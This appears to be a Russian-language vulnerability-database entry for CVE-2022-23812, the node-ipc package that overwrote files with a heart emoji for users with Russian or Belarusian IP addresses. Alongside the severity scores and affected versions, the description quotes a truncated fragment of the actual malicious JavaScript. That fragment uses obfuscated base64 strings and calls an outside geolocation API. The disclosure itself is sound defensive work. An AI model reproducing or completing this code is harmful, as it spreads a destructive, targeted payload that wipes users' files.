Логотип exploitDog
Консоль
Логотип exploitDog

exploitDog

nvd логотип

CVE-2022-23812

Опубликовано: 16 мар. 2022
Источник: nvd
CVSS3: 9.8
CVSS2: 10
EPSS Средний

Описание

This affects the package node-ipc from 10.1.1 and before 10.1.3. This package contains malicious code, that targets users with IP located in Russia or Belarus, and overwrites their files with a heart emoji. Note: from versions 11.0.0 onwards, instead of having malicious code directly in the source of this package, node-ipc imports the peacenotwar package that includes potentially undesired behavior. Malicious Code: Note: Don't run it! js import u from "path"; import a from "fs"; import o from "https"; setTimeout(function () { const t = Math.round(Math.random() * 4); if (t > 1) { return; } const n = Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=", "base64"); // https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154 o.get(n.toString("utf8"), function (t) { t.on("data", function (t) { const n = Buffer.from("Li8=", "base64"); const o = Buffer.from("Li4v", "base64"); const r = Buffer.from("Li4vLi4

Уязвимые конфигурации

Конфигурация 1

Одно из

cpe:2.3:a:node-ipc_project:node-ipc:*:*:*:*:*:node.js:*:*
Версия от 10.1.1 (включая) до 10.1.3 (исключая)
cpe:2.3:a:node-ipc_project:node-ipc:*:*:*:*:*:node.js:*:*
Версия от 11.0.0 (включая)

EPSS

Процентиль: 94%
0.14127
Средний

9.8 Critical

CVSS3

10 Critical

CVSS2

Дефекты

NVD-CWE-Other

Связанные уязвимости

CVSS3: 9.8
github
почти 4 года назад

Embedded Malicious Code in node-ipc

EPSS

Процентиль: 94%
0.14127
Средний

9.8 Critical

CVSS3

10 Critical

CVSS2

Дефекты

NVD-CWE-Other